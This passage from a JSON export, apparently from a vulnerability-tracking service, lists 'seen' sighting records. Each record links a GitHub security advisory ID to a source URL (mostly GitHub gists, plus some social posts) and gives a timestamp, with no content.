"2026-02-25T17:40:18.000000Z"}, {"uuid": "9f42f1b2-db7f-487d-96fe-a31ec3d6d1bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2PHG-QGMM-R638", "type": "seen", "source": "https://gist.github.com/alon710/e543dec211c6fa821b6eb41be3f9ef64", "content": "", "creation_timestamp": "2026-02-25T18:10:18.000000Z"}, {"uuid": "31ff3474-03df-4e2d-976c-b8b4ab2c9e47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c6rr-7pmc-73wc", "type": "seen", "source": "https://gist.github.com/alon710/4c89872b5367b732a7e8b5c781c3c38c", "content": "", "creation_timestamp": "2026-02-25T18:40:19.000000Z"}, {"uuid": "50954ed9-fd24-4714-a7cc-53fdf19e3d52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jhp4-jvq3-w5xr", "type": "seen", "source": "https://gist.github.com/alon710/1b38be1c4bfe28706dfdf76e6aecf149", "content": "", "creation_timestamp": "2026-02-25T19:10:19.000000Z"}, {"uuid": "d2170392-2a2f-4fa7-9f80-33558c8da0eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-fq4f-4738-rqxm", "type": "seen", "source": "https://gist.github.com/alon710/3c404d6776ba547e659e45aab0d6bdf9", "content": "", "creation_timestamp": "2026-02-25T20:10:18.000000Z"}, {"uuid": "d94bb60b-181f-4273-a343-b543b5cc6e6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-h9fp-p2p9-873q", "type": "seen", "source": "https://gist.github.com/alon710/6e7c8420a855ad42b024831d7bcfd1a5", "content": "", "creation_timestamp": "2026-02-25T21:10:19.000000Z"}, {"uuid": "67f018de-a4ef-4bd5-830f-ec4b86b0c09c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5PMP-JPCF-PWX6", "type": "seen", "source": "https://gist.github.com/alon710/c8ef02a720c5ab2caad0ee631080ee0f", "content": "", "creation_timestamp": "2026-03-02T18:40:09.000000Z"}, {"uuid": "c47845ec-166e-495b-8c89-1aec0b77e6e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-5pmp-jpcf-pwx6", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mg3wjx7soq2t", "content": "", "creation_timestamp": "2026-03-02T18:55:03.760177Z"}, {"uuid": "6d3484dc-d23f-4b4b-bb84-039928f43ca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p9x3-w98f-7j3q", "type": "seen", "source": "https://gist.github.com/alon710/6187e996b9891bde691d927e61e7e5eb", "content": "", "creation_timestamp": "2026-03-02T20:10:09.000000Z"}, {"uuid": "3cd63c4a-95ba-4ff1-9619-04fb8a365b5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-V8JW-8W5P-23G3", "type": "seen", "source": "https://gist.github.com/alon710/68ceddd240fe69f7692e8194132fbb65", "content": "", "creation_timestamp": "2026-03-02T21:10:09.000000Z"}, {"uuid": "e428ad7b-b711-4764-babc-50764909d39f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-xq3m-2v4x-88gg", "type": "seen", "source": "https://infosec.exchange/users/mttaggart/statuses/116427325979824661", "content": "", "creation_timestamp": "2026-04-18T19:20:09.117897Z"}, {"uuid": "fc646cee-f18b-46b9-88a7-602f54b9ec60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w7fw-mjwx-w883", "type": "seen", "source": "https://gist.github.com/alon710/c6963cc90ba7a2a5c311d6e3cd8e6558", "content": "", "creation_timestamp": "2026-02-12T17:40:24.000000Z"}, {"uuid": "4e7550b2-32c2-41ae-ba6c-0f79dee3ce19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8GRV-JQ2G-CFHW", "type": "seen", "source": "https://gist.github.com/alon710/041178d8a553aa39851ef0441a5d85f3", "content": "", "creation_timestamp": "2026-02-10T05:10:05.000000Z"}, {"uuid": "755098e6-1e1f-4fb2-8f3d-3797c15812c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwmx-9gcj-332h", "type": "seen", "source": "https://gist.github.com/alon710/41968f4cd423a2eb06975ee5587fe1d5", "content": "", "creation_timestamp": "2026-02-12T00:10:05.000000Z"}, {"uuid": "ba7dab58-9a8b-441d-a1e7-f6121ef39219", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4255-c27h-62m5", "type": "seen", "source": "https://gist.github.com/alon710/5db565d21892e24ae6ebdfecaa349708", "content": "", "creation_timestamp": "2026-02-10T05:40:05.000000Z"}, {"uuid": "658640fd-c443-49f7-a413-6fdc7f5d00a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4f2-39gr-45jh", "type": "seen", "source": "https://gist.github.com/alon710/db6c4209f64aab150c8716f6ba5f6a73", "content": "", "creation_timestamp": "2026-02-10T06:10:05.000000Z"}, {"uuid": "3dc8307c-7bc5-420b-90c2-b9b65fbe7d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7587-4WV6-M68M", "type": "seen", "source": "https://gist.github.com/alon710/f65205088d9ff964ef46286a174e62eb", "content": "", "creation_timestamp": "2026-02-14T12:10:27.000000Z"}, {"uuid": "e31f3f74-1bc2-490b-b917-c3894af30368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8h58-w33p-wq3g", "type": "seen", "source": "https://gist.github.com/alon710/997e41d0cfc43ce67a08d3950cd9e708", "content": "", "creation_timestamp": "2026-02-14T11:40:27.000000Z"}, {"uuid": "892cba76-0550-48a8-b416-4201bde400b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2c4m-g7rx-63q7", "type": "seen", "source": "https://gist.github.com/alon710/7fa9e24bf1f559b2a6524307fa25cc13", "content": "", "creation_timestamp": "2026-02-12T01:40:05.000000Z"}, {"uuid": "e7077195-3ad3-4acd-b8a5-05fdbbfb919c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4mh3-h929-w968", "type": "seen", "source": "https://gist.github.com/alon710/02bda46e993f75494aeab18d5a8fd277", "content": "", "creation_timestamp": "2026-02-10T06:40:05.000000Z"}, {"uuid": "84af99b5-a2db-446f-a422-3d752405257b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C7PH-F7JM-XV4W", "type": "seen", "source": "https://gist.github.com/alon710/297929c31cc494fb056a75e1f4a0f1f8", "content": "", "creation_timestamp": "2026-02-14T11:10:28.000000Z"}, {"uuid": "5a10667a-e911-4d33-a969-9e28a4d6ea0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2f2x-8mwp-p2gc", "type": "seen", "source": "https://gist.github.com/alon710/65570bea1d8bf7bce8ccfbb01e9a80b6", "content": "", "creation_timestamp": "2026-02-12T19:10:24.000000Z"}, {"uuid": "164dec22-863c-4f04-a117-8bb97656211a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "ghsa-7587-4wv6-m68m", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3meszbueg452h", "content": "", "creation_timestamp": "2026-02-14T12:25:06.517675Z"}, {"uuid": "61eb5f72-3f14-41ed-85da-a6b758b4f983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ww7g-4gwx-m7wj", "type": "seen", "source": "https://gist.github.com/alon710/c4dd7ac52eda0446afbd98eca59ffed4", "content": "", "creation_timestamp": "2026-02-10T07:10:05.000000Z"}, {"uuid": "7df56c9c-fdce-42da-ba56-7f019c3ffa3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cfh3-3jmp-rvhc", "type": "seen", "source": "https://seclists.org/oss-sec/2026/q1/162", "content": "", "creation_timestamp": "2026-02-12T00:25:06.000000Z"}, {"uuid": "71c700f7-1080-4ebf-b2b8-20d6e64fbe82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gf3v-fwqg-4vh7", "type": "seen", "source": "https://gist.github.com/alon710/acaa62d2c9f4a729ff2d09cb5a58ff4d", "content": "", "creation_timestamp": "2026-02-12T02:10:05.000000Z"}, {"uuid": "dd794dd8-5552-4394-8bf3-6f9424eb50da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8wc6-vgrq-x6cf", "type": "seen", "source": "https://gist.github.com/alon710/5080d2317b3823b046ee5cbcbe32ef2c", "content": "", "creation_timestamp": "2026-02-14T14:10:28.000000Z"}, {"uuid": "e83cb55d-d833-49b6-822f-3b42fa3b3c3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g966-83w7-6w38", "type": "seen", "source": "https://gist.github.com/alon710/ddfcc9ce61b90942fef47df753b076d0", "content": "", "creation_timestamp": "2026-02-12T19:40:23.000000Z"}, {"uuid": "d6e075da-2c44-44b1-8755-cb25c94e7ff3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "ghsa-8wc6-vgrq-x6cf", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3metatb7zye2a", "content": "", "creation_timestamp": "2026-02-14T14:40:04.318250Z"}, {"uuid": "49b11c8c-25b6-4da9-a7b0-b01cf9fbb651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6V2J-VR4H-F632", "type": "seen", "source": "https://gist.github.com/alon710/f83d4d97a82b23b891984bf8ac3bf1de", "content": "", "creation_timestamp": "2026-02-13T10:40:38.000000Z"}, {"uuid": "8f563870-2681-421b-ac11-693cd69bb8de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9f3f-wv7r-qc8r", "type": "seen", "source": "https://gist.github.com/alon710/3a12f0f5fd4b6863fd1cb17756a47aa1", "content": "", "creation_timestamp": "2026-02-12T02:40:05.000000Z"}, {"uuid": "27c2f62b-75b8-48a9-a52a-cf65c6bf40bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8hp-mq4h-rqm3", "type": "seen", "source": "https://infosec.exchange/users/harrysintonen/statuses/116045177891975357", "content": "", "creation_timestamp": "2026-02-10T07:34:51.912573Z"}, {"uuid": "87d84a6f-7b03-438f-98cf-5cd0dfd59f15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hxw8-4h9j-hq2r", "type": "seen", "source": "https://gist.github.com/alon710/39fd68ea5d11f2bf18c6fe6acdd0ee1d", "content": "", "creation_timestamp": "2026-02-10T07:40:05.000000Z"}, {"uuid": "b0d7695f-b8e4-4dbb-9dfb-fecf272dbbb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f339-246p-wwjp", "type": "seen", "source": "https://gist.github.com/alon710/647bef82efc8bc03f3b4034f54af7e26", "content": "", "creation_timestamp": "2026-02-10T08:10:05.000000Z"}, {"uuid": "a38d67b6-1e10-4774-88da-895455c60b6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q66H-M87M-J2Q6", "type": "seen", "source": "https://gist.github.com/alon710/c73f7ded7b4aa4f34b8357e21c422d50", "content": "", "creation_timestamp": "2026-02-10T08:40:08.000000Z"}, {"uuid": "0ef2d33e-72b6-4b0a-8298-d98c038f2ff7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XP79-9MXW-878J", "type": "seen", "source": "https://gist.github.com/alon710/9e4011e4a5d04506e2bb1497bf4b9849", "content": "", "creation_timestamp": "2026-02-13T12:10:23.000000Z"}, {"uuid": "5646b985-d730-4e02-afe1-521592f2b27f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9952-gv64-x94c", "type": "seen", "source": "https://gist.github.com/alon710/f15141bc1f55d69b0e8ca38fc9e28c11", "content": "", "creation_timestamp": "2026-02-14T19:30:27.000000Z"}, {"uuid": "33bfb820-331f-46ac-bb4b-cfd2bce1a224", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86x4-wp9f-wrr9", "type": "seen", "source": "https://gist.github.com/alon710/2089053e00741e826f0937c1005170e1", "content": "", "creation_timestamp": "2026-02-06T23:10:05.000000Z"}, {"uuid": "3c94c50b-e1f2-42b3-9e43-dd70a2278c74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wvcf-9xm8-7mrg", "type": "seen", "source": "https://gist.github.com/alon710/9ee8ed6e03428c4711cc07304c9dacce", "content": "", "creation_timestamp": "2026-02-12T04:00:05.000000Z"}, {"uuid": "90723587-5277-4b99-b84d-6a1e7c608b53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wj8p-jj64-h7ff", "type": "seen", "source": "https://gist.github.com/alon710/3d1e0c676fd161e289838724b2e46b8f", "content": "", "creation_timestamp": "2026-02-13T12:40:08.000000Z"}, {"uuid": "991c8e30-bc7a-4555-b1d3-91c01f644a81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jqp-9qjv-57m2", "type": "seen", "source": "https://gist.github.com/alon710/5ce8e9446cfcfc6b5c28fd54d836e762", "content": "", "creation_timestamp": "2026-02-06T23:40:05.000000Z"}, {"uuid": "164c6290-0e96-4ca4-a8b8-b8a80697e4b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cfh3-3jmp-rvhc", "type": "seen", "source": "https://gist.github.com/alon710/8164d166b74f218576799553a77db1a5", "content": "", "creation_timestamp": "2026-02-12T04:10:06.000000Z"}, {"uuid": "7f8675aa-bd51-44bf-969b-b553b9ff5717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX7M-69FF-9CRP", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mepgcmwkc6o2", "content": "", "creation_timestamp": "2026-02-13T02:07:34.237482Z"}, {"uuid": "7d57e5bc-b53e-44b5-b972-292e63ca6141", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-r5j5-q42h-fc93", "type": "seen", "source": "https://gist.github.com/alon710/be287b095692a958ba062da2bd656273", "content": "", "creation_timestamp": "2026-02-25T21:40:19.000000Z"}, {"uuid": "f4aea0ff-6be4-4e38-b183-0d01a0ad0125", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-X43W-PH7M-PFJX", "type": "seen", "source": "https://gist.github.com/alon710/293e46507acc8edc06151ab2b07b24f3", "content": "", "creation_timestamp": "2026-02-25T22:10:19.000000Z"}, {"uuid": "420a5a79-d97a-49c9-aa53-49d6e922c6e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-76rv-2r9v-c5m6", "type": "seen", "source": "https://gist.github.com/alon710/5330302f70cde11bed4700e9ceffc3e5", "content": "", "creation_timestamp": "2026-02-25T22:40:18.000000Z"}, {"uuid": "01ac50ae-c1e6-4dea-b4ab-9eda054b3d13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v9fg-3cr2-277j", "type": "seen", "source": "https://gist.github.com/alon710/825cb3df4d3482c72da947924a62434a", "content": "", "creation_timestamp": "2026-02-25T23:10:18.000000Z"}, {"uuid": "02487e9c-75f1-4f45-8180-3577a002a38b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mphv-75cg-56wg", "type": "seen", "source": "https://gist.github.com/alon710/2fdb93ea28abae568076465460152300", "content": "", "creation_timestamp": "2026-02-25T23:40:19.000000Z"}, {"uuid": "d77019b4-6357-4511-b7a2-e7d20ccd0be9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4q3h-vp4r-prv2", "type": "seen", "source": "https://gist.github.com/alon710/06993c8eefd10ccf37a23340cac818e4", "content": "", "creation_timestamp": "2026-02-26T00:10:19.000000Z"}, {"uuid": "a3009ed9-407c-40eb-8825-e5acc25205e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mhr3-j7m5-c7c9", "type": "seen", "source": "https://gist.github.com/alon710/cf52281320a58d0170a51a41a1a8c9ce", "content": "", "creation_timestamp": "2026-02-26T00:40:20.000000Z"}, {"uuid": "62303b53-0424-440f-96bf-036211ed1a23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vpcf-gvg4-6qwr", "type": "seen", "source": "https://gist.github.com/alon710/047ec00f4a4d15a45b489fce0a995744", "content": "", "creation_timestamp": "2026-02-26T00:40:19.000000Z"}, {"uuid": "aca388a2-117c-477e-b382-57a5f4688c8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vpcf-gvg4-6qwr", "type": "seen", "source": "https://gist.github.com/alon710/166e0bc3fefcdaa30e1841507d50e54c", "content": "", "creation_timestamp": "2026-02-26T00:50:19.000000Z"}, {"uuid": "a4bace67-3f8c-4c9f-bf02-8ebfac2e93c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p2v6-84h2-5x4r", "type": "seen", "source": "https://gist.github.com/alon710/58d60cb43e35e8d628baff9aff194e2e", "content": "", "creation_timestamp": "2026-02-26T01:10:19.000000Z"}, {"uuid": "1ccbcc30-0ba2-4462-8761-e3e1015667dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j2hp-6m75-v4j4", "type": "seen", "source": "https://gist.github.com/tomholford/a1d777dd1bce5e458e41a205078f5e9f", "content": "", "creation_timestamp": "2026-02-26T01:26:06.000000Z"}, {"uuid": "68c34e6c-1eea-4b8f-b0b7-991eb450ada8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x288-3778-4hhx", "type": "seen", "source": "https://gist.github.com/alon710/53d0a446648e9dbad6bc94a3baf5290b", "content": "", "creation_timestamp": "2026-02-26T01:40:19.000000Z"}, {"uuid": "94be7c86-d2c8-4d8a-930e-b2bb6e2dab44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xh43-g2fq-wjrj", "type": "seen", "source": "https://gist.github.com/alon710/1371fd3ef3a3abfae5e6b307e565141d", "content": "", "creation_timestamp": "2026-02-26T02:10:19.000000Z"}, {"uuid": "b46264d2-cbe8-4e40-b8e2-9d8b1ab8158a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7jp5-298q-jg98", "type": "seen", "source": "https://gist.github.com/alon710/9006618da1b051586fad7e8efcfefd06", "content": "", "creation_timestamp": "2026-02-26T02:40:19.000000Z"}, {"uuid": "60042d2a-1007-4316-a338-454079539b19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w5fh-f8xh-5x3p", "type": "seen", "source": "https://gist.github.com/alon710/a799163ee0d2e212318aa5781377d8b5", "content": "", "creation_timestamp": "2026-02-26T03:10:19.000000Z"}, {"uuid": "c84fff09-d792-4836-9803-fe757759e7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mw96-cpmx-2vgc", "type": "seen", "source": "https://gist.github.com/alon710/df027fa71b827939c4a8376bd84725f1", "content": "", "creation_timestamp": "2026-02-26T03:40:19.000000Z"}, {"uuid": "39a34ab8-88bc-4c41-9579-f2b9ab7eace9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5rq4-664w-9x2c", "type": "seen", "source": "https://gist.github.com/alon710/a50ab760b1cd61a4ec4a8d15f1b09323", "content": "", "creation_timestamp": "2026-02-26T04:10:19.000000Z"}, {"uuid": "d1224f8c-2d39-48c5-ab13-ec767c355673", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jm64-8m5q-4qh8", "type": "seen", "source": "https://gist.github.com/alon710/c4c795d4b3dc7802a6d056ea6b479de3", "content": "", "creation_timestamp": "2026-02-26T04:40:19.000000Z"}, {"uuid": "b5eae12f-f9e2-4d9a-909d-0b3c02a41777", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-76m6-pj3w-v7mf", "type": "seen", "source": "https://gist.github.com/rollkoffers-gaston/46391c991c70a7d70cdb0c31d53558a9", "content": "", "creation_timestamp": "2026-02-26T05:13:40.000000Z"}, {"uuid": "a7c69973-eb7b-49f1-bb9e-7919165fc4bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2p9h-rqjw-gm92", "type": "seen", "source": "https://gist.github.com/alon710/0d80cde6bd8b242b554f8f77bc43b2c0", "content": "", "creation_timestamp": "2026-02-26T05:10:19.000000Z"}, {"uuid": "6c0b2f71-04c0-4b58-8dab-c2d802d979b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3ccg-x393-96v8", "type": "seen", "source": "https://gist.github.com/alon710/76267e5daeda7cb4e541e53f49c018f0", "content": "", "creation_timestamp": "2026-02-26T05:40:19.000000Z"}, {"uuid": "72b55530-3036-48e5-886c-4308c3f09967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4qgr-4h56-8895", "type": "seen", "source": "https://gist.github.com/alon710/79921bd932bf2a0c25c4d230a1f15f91", "content": "", "creation_timestamp": "2026-02-26T06:10:19.000000Z"}, {"uuid": "21c224b9-fdf6-4785-a566-8e6126ea4c49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-x2mw-7j39-93xq", "type": "seen", "source": "https://gist.github.com/alon710/25b136d0038953e552999c15a9366d7c", "content": "", "creation_timestamp": "2026-02-26T06:40:19.000000Z"}, {"uuid": "af136f59-d681-48aa-bae7-16c2ded7acc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wxx7-mcgf-j869", "type": "seen", "source": "https://gist.github.com/alon710/701a60f9f2d4887df5a419fe55913115", "content": "", "creation_timestamp": "2026-02-26T07:10:19.000000Z"}, {"uuid": "dca17086-c848-4223-8ac7-2c1ccc3a63a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jjpj-p2wh-qf23", "type": "seen", "source": "https://gist.github.com/alon710/1352ed038e89cecf857a70857225ae46", "content": "", "creation_timestamp": "2026-02-26T07:40:19.000000Z"}, {"uuid": "1c65640a-05e5-4771-967f-383cbfe49fd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ALE-002", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mfrgfmqiah2k", "content": "", "creation_timestamp": "2026-02-26T14:39:40.877851Z"}, {"uuid": "9c371646-a6ae-48f5-8a88-5da53604cbfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-42wg-38gx-85rh", "type": "seen", "source": "https://gist.github.com/alon710/ef8daafa48df3faf43c600dde2331d8a", "content": "", "creation_timestamp": "2026-02-26T15:40:19.000000Z"}, {"uuid": "561ab880-6bc2-4143-b13f-5de661c4a7c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-MQPR-49JJ-32RC", "type": "seen", "source": "https://gist.github.com/alon710/178e566a3315ca4890a1f1cf1f52cff5", "content": "", 